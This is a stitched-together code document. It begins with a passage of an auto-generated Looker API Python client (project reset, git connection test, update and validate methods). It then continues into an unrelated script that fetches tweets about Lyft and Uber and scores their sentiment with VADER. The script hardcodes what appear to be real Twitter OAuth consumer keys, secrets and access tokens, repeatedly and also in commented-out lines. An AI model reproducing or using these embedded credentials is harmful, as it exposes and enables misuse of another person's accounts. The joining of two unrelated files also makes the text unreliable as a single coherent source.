This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_remote(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.reset_project_to_remote_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.reset_project_to_remote_with_http_info(project_id, **kwargs) # noqa: E501
return data
def reset_project_to_remote_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Reset To Remote # noqa: E501
### Reset a project development branch to the revision of the project that is on the remote. **DANGER** this will delete any changes that have not been pushed to a remote repository. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.reset_project_to_remote_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Id of project (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method reset_project_to_remote" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `reset_project_to_remote`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/reset_to_remote', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
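# Both reset endpoints above permanently discard unpushed changes. A cautious
# caller might gate them behind an explicit flag (illustrative only):
#
#   if confirm_destructive_reset:
#       api.reset_project_to_remote('my_project')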
def run_git_connection_test(self, project_id, test_id, **kwargs): # noqa: E501
"""Run Git Connection Test # noqa: E501
### Run a git connection test Run the named test on the git service used by this project and return the result. This is intended to help debug git connections when things do not work properly, giving more helpful information about why a git URL is not working with Looker. The tests are intended to be run in the order they are returned from the /projects/ID/git_connection_tests endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.run_git_connection_test(project_id, test_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str test_id: Test Id (required)
:return: GitConnectionTestResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.run_git_connection_test_with_http_info(project_id, test_id, **kwargs) # noqa: E501
else:
(data) = self.run_git_connection_test_with_http_info(project_id, test_id, **kwargs) # noqa: E501
return data
def run_git_connection_test_with_http_info(self, project_id, test_id, **kwargs): # noqa: E501
"""Run Git Connection Test # noqa: E501
### Run a git connection test Run the named test on the git service used by this project and return the result. This is intended to help debug git connections when things do not work properly, giving more helpful information about why a git URL is not working with Looker. The tests are intended to be run in the order they are returned from the /projects/ID/git_connection_tests endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.run_git_connection_test_with_http_info(project_id, test_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str test_id: Test Id (required)
:return: GitConnectionTestResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'test_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method run_git_connection_test" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `run_git_connection_test`") # noqa: E501
# verify the required parameter 'test_id' is set
if ('test_id' not in params or
params['test_id'] is None):
raise ValueError("Missing the required parameter `test_id` when calling `run_git_connection_test`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
if 'test_id' in params:
path_params['test_id'] = params['test_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/git_connection_tests/{test_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GitConnectionTestResult', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
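# The docstring says the tests should run in the order returned by the
# /projects/{project_id}/git_connection_tests endpoint. A sketch, assuming a
# companion method for that endpoint exists elsewhere in this class:
#
#   for test in api.all_git_connection_tests('my_project'):
#       result = api.run_git_connection_test('my_project', test.id)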
def update_project(self, project_id, body, **kwargs): # noqa: E501
"""Update Project # noqa: E501
### Update Project Configuration Apply changes to a project's configuration. #### Configuring Git for a Project To set up a Looker project with a remote git repository, follow these steps: 1. Call `update_session` to select the 'dev' workspace. 1. Call `create_git_deploy_key` to create a new deploy key for the project 1. Copy the deploy key text into the remote git repository's ssh key configuration 1. Call `update_project` to set the project's `git_remote_url` (and `git_service_name`, if necessary). When you modify a project's `git_remote_url`, Looker connects to the remote repository to fetch metadata. The remote git repository MUST be configured with the Looker-generated deploy key for this project prior to setting the project's `git_remote_url`. To set up a Looker project with a git repository residing on the Looker server (a 'bare' git repo): 1. Call `update_session` to select the 'dev' workspace. 1. Call `update_project` setting `git_remote_url` to nil and `git_service_name` to \"bare\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_project(project_id, body, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param Project body: Project (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_project_with_http_info(project_id, body, **kwargs) # noqa: E501
else:
(data) = self.update_project_with_http_info(project_id, body, **kwargs) # noqa: E501
return data
def update_project_with_http_info(self, project_id, body, **kwargs): # noqa: E501
"""Update Project # noqa: E501
### Update Project Configuration Apply changes to a project's configuration. #### Configuring Git for a Project To set up a Looker project with a remote git repository, follow these steps: 1. Call `update_session` to select the 'dev' workspace. 1. Call `create_git_deploy_key` to create a new deploy key for the project 1. Copy the deploy key text into the remote git repository's ssh key configuration 1. Call `update_project` to set the project's `git_remote_url` (and `git_service_name`, if necessary). When you modify a project's `git_remote_url`, Looker connects to the remote repository to fetch metadata. The remote git repository MUST be configured with the Looker-generated deploy key for this project prior to setting the project's `git_remote_url`. To set up a Looker project with a git repository residing on the Looker server (a 'bare' git repo): 1. Call `update_session` to select the 'dev' workspace. 1. Call `update_project` setting `git_remote_url` to nil and `git_service_name` to \"bare\". # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_project_with_http_info(project_id, body, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param Project body: Project (required)
:param str fields: Requested fields
:return: Project
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'body', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `update_project`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Project', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
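# The remote-git setup flow from the docstring above, sketched as comments.
# update_session and create_git_deploy_key are referenced by the docstring and
# assumed to live elsewhere in this SDK; ids and bodies are illustrative:
#
#   api.update_session(session_body_selecting_dev_workspace)
#   deploy_key = api.create_git_deploy_key('my_project')
#   # register deploy_key with the remote repository, then:
#   api.update_project('my_project', project_body_with_git_remote_url)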
def validate_project(self, project_id, **kwargs): # noqa: E501
"""Validate Project # noqa: E501
### Validate Project Performs lint validation of all lookml files in the project. Returns a list of errors found, if any. Validating the content of all the files in a project can be computationally intensive for large projects. For best performance, call `validate_project(project_id)` only when you really want to recompute project validation. To quickly display the results of the most recent project validation (without recomputing), use `project_validation_results(project_id)` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.validate_project(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.validate_project_with_http_info(project_id, **kwargs) # noqa: E501
else:
(data) = self.validate_project_with_http_info(project_id, **kwargs) # noqa: E501
return data
def validate_project_with_http_info(self, project_id, **kwargs): # noqa: E501
"""Validate Project # noqa: E501
### Validate Project Performs lint validation of all lookml files in the project. Returns a list of errors found, if any. Validating the content of all the files in a project can be computationally intensive for large projects. For best performance, call `validate_project(project_id)` only when you really want to recompute project validation. To quickly display the results of the most recent project validation (without recomputing), use `project_validation_results(project_id)` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.validate_project_with_http_info(project_id, async=True)
>>> result = thread.get()
:param async bool
:param str project_id: Project Id (required)
:param str fields: Requested fields
:return: ProjectValidation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'fields'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method validate_project" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params or
params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `validate_project`") # noqa: E501
collection_formats = {}
path_params = {}
if 'project_id' in params:
path_params['project_id'] = params['project_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/projects/{project_id}/validate', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ProjectValidation', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
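# A hedged example of consuming the lint results (attribute names are assumed
# from the ProjectValidation response type, not confirmed by this file):
#
#   validation = api.validate_project('my_project')
#   for error in (validation.errors or []):
#       print(error)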
# -*- coding: utf-8 -*-
# scripts/nlpscript.py (JLivingston01/py_research, MIT license)
"""
Created on Wed Feb 6 16:04:14 2019
@author: jliv
"""
#PACKAGES
import oauth2
import datetime as dt
import re
import json
import matplotlib.pyplot as plt
import pandas as pd
from os import listdir
import gensim
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from gensim import corpora, models
from nltk.stem import WordNetLemmatizer
from nltk.stem import SnowballStemmer
from nltk.stem.porter import *
import nltk
import nltk.sentiment
import numpy as np
np.random.seed(2018)
from wordcloud import get_single_color_func
from wordcloud import WordCloud
import tensorflow
from tensorflow import keras
from tensorflow import losses
from keras.utils import np_utils
from sklearn.preprocessing import LabelEncoder
import pickle
#49-545, api pull, clean for 1 day of data
stopwords = nltk.corpus.stopwords
stop_words = set(stopwords.words("english"))
word_tokenize = nltk.tokenize.word_tokenize
query = 'https://api.twitter.com/1.1/search/tweets.json?l=en&q="Fox%20News"%20-Congrats%20-Stand%20-Laura%20-Why%20since%3A2019-01-29%20until%3A2019-01-30&result_type=recent&count=1000&tweet_mode=extended'
def req(query):
consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX'.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA'.encode('utf-8'))
token = oauth2.Token(key='1047557115156602880-Lg0ZzFAXdRBE3MWvIjDoosgbrmqbFd', secret='XtYHGlsPUBxb2cc4O48NqXmrtVzEiplawEO3illlAHmKz')
client = oauth2.Client(consumer, token)
resp, content = client.request( query, method="GET", body=bytes("", "utf-8"), headers=None )
return content
#home_timeline = req(query)
#consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX'.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA'.encode('utf-8'))
#token = oauth2.Token(key='1047557115156602880-Lg0ZzFAXdRBE3MWvIjDoosgbrmqbFd', secret='XtYHGlsPUBxb2cc4O48NqXmrtVzEiplawEO3illlAHmKz')
#client = oauth2.Client(consumer, token)
#resp, content = client.request( query, method="GET", body=bytes("", "utf-8"), headers=None )
def oauth_req(url, token, secret, http_method="GET", post_body="", http_headers=None):
consumer = oauth2.Consumer(key='kq5bb4YfBfoLUXd90vCwq4RWX '.encode('utf-8'), secret='JzIDVyTToHGRpoSX61zQHr1QyXNVyOM7DHDLFrfIoK4q3XlMcA '.encode('utf-8'))
token = oauth2.Token(key=token, secret=secret)
client = oauth2.Client(consumer, token)
resp, content = client.request( url, method=http_method, body=bytes(post_body, "utf-8"), headers=http_headers )
return content
searchterm = '"Lyft"'
terma = searchterm.replace('"',"")
terma = terma.replace(" ","")
language = 'en'
startdate = dt.datetime.now()
to_date = startdate + dt.timedelta(1)
startdate = dt.datetime.strftime(startdate,"%Y-%m-%d")
to_date = dt.datetime.strftime(to_date,"%Y-%m-%d")
#startdate = "2019-02-05"
#to_date = "2019-02-06"
max_tweets = 1000
appendix = "v1"
#exclude = ['-Congrats','-Stand','-Laura','-Why']
exclude = ['']
# how: 'mixed', 'recent', or 'popular'
how = 'mixed'
searchterm = searchterm.split()
searchterm = "%20".join(searchterm)
enddate = dt.datetime.strftime(dt.datetime.strptime(startdate,"%Y-%m-%d") +dt.timedelta(1),"%Y-%m-%d")
days = dt.datetime.strptime(to_date,"%Y-%m-%d") - dt.datetime.strptime(startdate,"%Y-%m-%d")
days = days.days
exclude = "%20".join(exclude)
parameters = (language,searchterm,startdate,enddate)
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&count=1000".format(language,searchterm,exclude,startdate,enddate)
times = []
date = []
text = []
retweet_cnt = []
fvrt_cnt = []
user = []
user_flwrs=[]
user_statuses = []
timezone = []
'''len(text)
lengths = []
for i in text:
lengths.append(len(i))'''
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&tweet_mode=extended&count=1000".format(language,searchterm,exclude,startdate,enddate)
#query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
#home_timeline = oauth_req(query, '986743245127503872-ePHRirA1hxJsMVPjogWbFSeZFmo4V5Q'.encode('utf-8'), 'N4PqSMhHGqjlZ2yqmLnPB8cFJgPXfMsj7PbzSrk55ageO'.encode('utf-8') )
raw_query="lang={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type={}&count=1000&tweet_mode=extended".format(language,searchterm,exclude,startdate,enddate,how)
query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
home_timeline = req(query)
home_timeline = home_timeline.decode("utf-8")
home_timeline = json.loads(home_timeline)
statuses = home_timeline['statuses']
print(len(statuses))
for i in range(len(statuses)):
times.append(statuses[i]['created_at'])
try:
text.append(statuses[i]['retweeted_status']['full_text'])
except:
text.append(statuses[i]['full_text'])
fvrt_cnt.append(statuses[i]['favorite_count'])
retweet_cnt.append(statuses[i]['retweet_count'])
user.append(statuses[i]['user']['name'])
user_flwrs.append(statuses[i]['user']['followers_count'])
user_statuses.append(statuses[i]['user']['statuses_count'])
timezone.append(statuses[i]['user']['time_zone'])
emojis = pd.read_csv('C://Users/jliv/Downloads/emojis.txt',sep = '\t', encoding = 'utf-8')
#Map of Unicode and Names
emoji_map = pd.DataFrame()
emoji_map['name'] = emojis['Name(s)']
emoji_map['code'] = emojis['Escaped Unicode']
#Map of Emojis and names
emoji_map1 = pd.DataFrame()
emoji_map1['name'] = emojis['Name(s)']
emoji_map1['Emoji'] = emojis['Emoji']
#Handle escape characters in unicode
codes = []
for i in list(emojis['Escaped Unicode']):
x = i.replace("\\","\\")
codes.append(x)
emojislist = emoji_map1['Emoji']
#Convert CSVs of mappings to dict mappings
emoji_map.index = codes
emoji_dict = emoji_map.to_dict()
emoji_dict = emoji_dict['name']
emoji_map1.index = emojislist
emoji_dict1 = emoji_map1.to_dict()
emoji_dict1 = emoji_dict1['name']
#Replace tweet emojis and unicode with descriptions of characters
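# e.g. "Great ride 😀" becomes "Great ride grinning face"
# (illustrative; the actual names come from the Name(s) column of emojis.txt)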
emoji_clean = []
for i in text:
x = i
for k,v in emoji_dict1.items():
x = x.replace(k, v)
for k,v in emoji_dict.items():
x = x.replace(k, v)
emoji_clean.append(x)
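# Clean each tweet: strip URLs, @handles, pic.twitter links, escaped unicode
# sequences, and punctuation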
tweetvector_clean = []
for i in emoji_clean:
x = re.sub(r"^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(:[0-9]{1,5})?(\/.*)?$"," ", i)
x = re.sub(r"htt\S+"," ", x) #x = x.decode('utf-8')
x = re.sub(r"pic.twit\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"@\S+"," ", x)
x = re.sub(r"\xa0"," ", x)
x = re.sub(r"\\u\S+"," ", x)
x = x.replace('#',' ')
x = x.replace('amp;','&')
x = x.replace('gt;',' ')
x = x.replace('\\n',' ')
y = x.replace('$',' ')
y = y.replace('(',' ')
y = y.replace('–',' ')
y = y.replace('‘',' ')
y = y.replace('“',' ')
y = y.replace('”',' ')
y = y.replace('`',' ')
y = y.replace(']',' ')
y = y.replace('[',' ')
y = y.replace(';',' ')
y = y.replace(')',' ')
y = y.replace('/',' ')
y = y.replace('*',' ')
y = y.replace(',',' ')
y = y.replace('’','')
y = y.replace('.','')
y = y.replace('-',' ')
y = y.replace("'",'')
y = y.replace(':',' ')
y = y.replace('@',' ')
y = y.replace('!',' ')
y = y.replace('…',' ')
y = y.replace('?',' ')
y = y.replace('>',' ')
y = y.replace('&',' ')
y = y.replace("\\","")
y = y.replace("\\u2066","")
tweetvector_clean.append(y)
tweetvector_tokenized = []
for i in tweetvector_clean:
x = word_tokenize(i)
tweetvector_tokenized.append(x)
tweetvector_stopped = []
for i in tweetvector_tokenized:
newstatement = [j for j in i if j not in stop_words]
tweetvector_stopped.append(newstatement)
####
final_tweets = []
for i in tweetvector_stopped:
x = " ".join(i)
final_tweets.append(x)
sid = nltk.sentiment.vader.SentimentIntensityAnalyzer()
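# VADER's compound score is normalized to [-1, 1]; tweets scoring exactly 0
# are treated as neutral further below (requires the vader_lexicon NLTK data)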
compound = []
neutral = []
negative = []
positive = []
for i in final_tweets:
ss = sid.polarity_scores(i)
comp = ss['compound']
neg = ss['neg']
neu = ss['neu']
pos = ss['pos']
compound.append(comp)
neutral.append(neu)
negative.append(neg)
positive.append(pos)
tweet_df = pd.DataFrame()
tweet_df['datetime'] = times
tweet_df['text'] = text
tweet_df['retweet_cnt'] = retweet_cnt
tweet_df['fvrt_cnt'] = fvrt_cnt
tweet_df['final_tweets'] = final_tweets
tweet_df['compound'] = compound
tweet_df['positive'] = positive
tweet_df['neutral'] = neutral
tweet_df['negative'] = negative
date = []
time = []
for i in list(times):
x = dt.datetime.strptime(i,"%a %b %d %H:%M:%S %z %Y")
d = dt.datetime.strftime(x,"%Y-%m-%d")
t = dt.datetime.strftime(x,"%H:%M:%S")
date.append(d)
time.append(t)
tweet_df['date'] = date
tweet_df['time'] = time
tweet_non_neutral = tweet_df[tweet_df['compound'] != 0]
tweet_neutral = tweet_df[tweet_df['compound'] == 0 ]
tweet_summary = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'mean')
tweet_count = pd.pivot_table(tweet_non_neutral, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_all_count = pd.pivot_table(tweet_df, values = ['compound'],index = ['date'], aggfunc = 'count')
tweet_summary.reset_index(inplace = True, drop = False)
tweet_count.reset_index(inplace = True, drop = False)
tweet_all_count.reset_index(inplace = True, drop = False)
tweet_summary = pd.merge(tweet_summary,tweet_count, on = 'date', how = 'left')
tweet_summary = pd.merge(tweet_summary,tweet_all_count, on = 'date', how = 'left')
tweet_summary = tweet_summary.rename(index = str, columns = {'compound_x':'mean_compound','compound_y':'non_neutral_tweets','compound':'total_tweets'})
now = dt.datetime.strftime(dt.datetime.now(),"%Y-%m-%d")
tweet_df.to_csv("C://Users/jliv/Downloads/tweets/tweettest/"+terma+"tweets"+startdate+".csv")
tweet_summary.to_csv("C://Users/jliv/Downloads/tweets/"+terma+"scores"+startdate+".csv")
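# The same pull/clean/score pipeline is repeated below for the "Uber" search term.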
searchterm = '"Uber"'
terma = searchterm.replace('"',"")
terma = terma.replace(" ","")
language = 'en'
startdate = dt.datetime.now()
to_date = startdate + dt.timedelta(1)
startdate = dt.datetime.strftime(startdate,"%Y-%m-%d")
to_date = dt.datetime.strftime(to_date,"%Y-%m-%d")
#startdate = "2019-02-05"
#to_date = "2019-02-06"
max_tweets = 1000
appendix = "v1"
#exclude = ['-Congrats','-Stand','-Laura','-Why']
exclude = ['']
# how: 'mixed', 'recent', or 'popular'
how = 'mixed'
searchterm = searchterm.split()
searchterm = "%20".join(searchterm)
enddate = dt.datetime.strftime(dt.datetime.strptime(startdate,"%Y-%m-%d") +dt.timedelta(1),"%Y-%m-%d")
days = dt.datetime.strptime(to_date,"%Y-%m-%d") - dt.datetime.strptime(startdate,"%Y-%m-%d")
days = days.days
exclude = "%20".join(exclude)
parameters = (language,searchterm,startdate,enddate)
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&count=1000".format(language,searchterm,exclude,startdate,enddate)
times = []
date = []
text = []
retweet_cnt = []
fvrt_cnt = []
user = []
user_flwrs=[]
user_statuses = []
timezone = []
'''len(text)
lengths = []
for i in text:
lengths.append(len(i))'''
#raw_query="l={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type=mixed&tweet_mode=extended&count=1000".format(language,searchterm,exclude,startdate,enddate)
#query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
#home_timeline = oauth_req(query, '986743245127503872-ePHRirA1hxJsMVPjogWbFSeZFmo4V5Q'.encode('utf-8'), 'N4PqSMhHGqjlZ2yqmLnPB8cFJgPXfMsj7PbzSrk55ageO'.encode('utf-8') )
raw_query="lang={}&q={}%20{}%20since%3A{}%20until%3A{}&result_type={}&count=1000&tweet_mode=extended".format(language,searchterm,exclude,startdate,enddate,how)
query = 'https://api.twitter.com/1.1/search/tweets.json?'+raw_query
home_timeline = req(query)
home_timeline = home_timeline.decode("utf-8")
home_timeline = json.loads(home_timeline)
statuses = home_timeline['statuses']
print(len(statuses))
for i in range(len(statuses)):
times.append(statuses[i]['created_at'])
try:
text.append(statuses[i]['retweeted_status']['full_text'])
except:
text.append(statuses[i]['full_text'])
fvrt_cnt.append(statuses[i]['favorite_count'])
retweet_cnt.append(statuses[i]['retweet_count'])
user.append(statuses[i]['user']['name'])
user_flwrs.append(statuses[i]['user']['followers_count'])
user_statuses.append(statuses[i]['user']['statuses_count'])
timezone.append(statuses[i]['user']['time_zone'])
emojis = pd.read_csv('C://Users/jliv/Downloads/emojis.txt',sep = '\t', encoding = 'utf-8')
#Map of Unicode and Names
emoji_map = pd.DataFrame()
emoji_map['name'] = emojis['Name(s)']
emoji_map['code'] = emojis['Escaped Unicode']
#Map of Emojis and names
emoji_map1 = pd.DataFrame()
emoji_map1['name'] = emojis['Name(s)']
emoji_map1['Emoji'] = emojis['Emoji']
#Handle escape characters in unicode
codes = []
for i in list(emojis['Escaped Unicode']):
x = i.replace("\\","\\")
codes.append(x)
emojislist = emoji_map1['Emoji']
#Convert CSVs of mappings to dict mappings
emoji_map.index = codes
emoji_dict = emoji_map.to_dict()
emoji_dict = emoji_dict['name']
emoji_map1.index = emojislist
emoji_dict1 = emoji_map1.to_dict()
emoji_dict1 = emoji_dict1['name']
#Replace tweet emojis and unicode with descriptions of characters
emoji_clean = []
for i in text:
x = i
for k,v in emoji_dict1.items():
x = x.replace(k, v)
for k,v in emoji_dict.items():
x = x.replace(k, v)
emoji_clean.append(x)
tweetvector_clean = []
for i in emoji_clean:
x = re.sub(r"^(http:\/\/www\.|https:\/\/www\.|http:\/\/|https:\/\/)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}(:[0-9]{1,5})?(\/.*)?$"," ", i)
x = re.sub(r"htt\S+"," ", x) #x = x.decode('utf-8')
x = re.sub(r"pic.twit\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"www.\S+"," ", x)
x = re.sub(r"@\S+"," ", x)
x = re.sub(r"\xa0"," ", x)
x = re.sub(r"\\u\S+"," ", x)
x = x.replace('#',' ')
x = x.replace('amp;','&')
x = x.replace('gt;',' ')
x = x.replace('\\n',' ')
y = x.replace('$',' ')
y = y.replace('(',' ')
y = y.replace('–',' ')
y = y.replace('‘',' ')
y = y.replace('“',' ')
y = y.replace('”',' ')
y = y.replace('`',' ')
y = y.replace(']',' ')
y = y.replace('[',' ')
y = y.replace(';',' ')
y = y.replace(')',' ')
y = y.replace('/',' ')
y = y.replace('*',' ')
y = y.replace(',',' ')
y = y.replace('’','')
y = y.replace('.','')
y = y.replace('-',' ')
y = y.replace("'",'')
y = y.replace(':',' ')
y = y.replace('@',' ')
y = y.replace('!',' ')
y = y.replace('…',' ')
y = y.replace('?',' ')
y = y.replace('>',' ')
y = y.replace('&',' ')
y = y.replace("\\","")
y = y.replace("\\u2066","")
tweetvector_clean.append(y)
tweetvector_tokenized = []
for i in tweetvector_clean:
x = word_tokenize(i)
tweetvector_tokenized.append(x)
tweetvector_stopped = []
for i in tweetvector_tokenized:
newstatement = [j for j in i if j not in stop_words]
tweetvector_stopped.append(newstatement)
####
final_tweets = []
for i in tweetvector_stopped:
x = " ".join(i)
final_tweets.append(x)
sid = nltk.sentiment.vader.SentimentIntensityAnalyzer()
compound = []
neutral = []
negative = []
positive = []
for i in final_tweets:
ss = sid.polarity_scores(i)
comp = ss['compound']
neg = ss['neg']
neu = ss['neu']
pos = ss['pos']
compound.append(comp)
neutral.append(neu)
negative.append(neg)
positive.append(pos)
tweet_df = pd.DataFrame()
tweet_df['datetime'] = times
tweet_df['text'] = text
tweet_df['retweet_cnt'] = retweet_cnt
tweet_df['fvrt_cnt'] = fvrt_cnt
tweet_df['final_tweets'] = final_tweets
tweet_df['compound'] = compound
tweet_df['positive'] = positive
tweet_df['neutral'] = neutral
tweet_df['negative'] = negative
date = []
time = []
for i in list(times):
x = dt.datetime.strptime(i,"%a %b %d %H:%M:%S %z %Y")
d = dt.datetime.strftime(x,"%Y-%m-%d")
t = dt.datetime.strftime(x,"%H:%M:%S")
date.append(d)
time.append(t)
tweet_df['date'] = date
tweet_df['time'] = time
tweet_non_neutral = tweet_df[tweet_df['compound'] != 0]
tweet_neutral = tweet_df[tweet_df['compound'] == 0 ]
